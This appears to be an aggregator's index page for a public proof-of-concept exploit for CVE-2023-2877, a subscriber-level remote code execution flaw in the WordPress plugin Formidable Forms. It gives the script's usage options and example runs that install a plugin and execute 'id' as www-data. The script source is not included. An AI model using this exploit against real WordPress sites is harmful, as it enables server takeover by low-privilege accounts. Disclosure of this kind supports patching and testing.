CVE-2023-2877 PoC — WordPress plugin Formidable Forms 安全漏洞

Source

Associated Vulnerability

Description

Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution

Readme

# CVE-2023-2877
Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution


Usage
---

```
usage: CVE-2023-2877.py [-h] -w URL -u USERNAME -p PASSWORD [-pl PLUGIN] [-c CMD]

CVE-2023-2877 - Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution Script

options:
  -h, --help            show this help message and exit
  -w URL, --url URL     WordPress site URL
  -u USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
  -pl PLUGIN, --plugin PLUGIN
                        Different Plugin to Install i.e mstore-api.3.9.0.zip
  -c CMD, --cmd CMD     Command value
```

Example
---

```
$ python3 CVE-2023-2877.py -w http://wordpress.lan -u user -p useruser1
Successfully logged in.
Token extracted: 15157e0f4740e9d1bbccdc5edbef1292943daf7d064637de094b2af2e9364ee9262f985d41d1658d90f1387800d09e8269a93f6397333e61c13240ababb4648d
Plugin installed successfully.
Now run exploit script with --cmd / -c and command.
```

```
$ python3 CVE-2023-2877.py -w http://wordpress.lan -u user -p useruser1 -c id
Data:
[['uid=33(www-data) gid=33(www-data) groups=33(www-data)']]
```

Warning
---
YOU NEED TO UNINSTALL THE VULNERABLE PLUGIN User Post Gallery as it's got not authentication!

File Snapshot

 [4.0K]  /data/pocs/2da601fef7226c28e8a1d4df97a25360db9e1614
├── [4.3K]  CVE-2023-2877.py
├── [ 11K]  LICENSE
├── [1.3K]  README.md
└── [   9]  requirements.txt

0 directories, 4 files

Remarks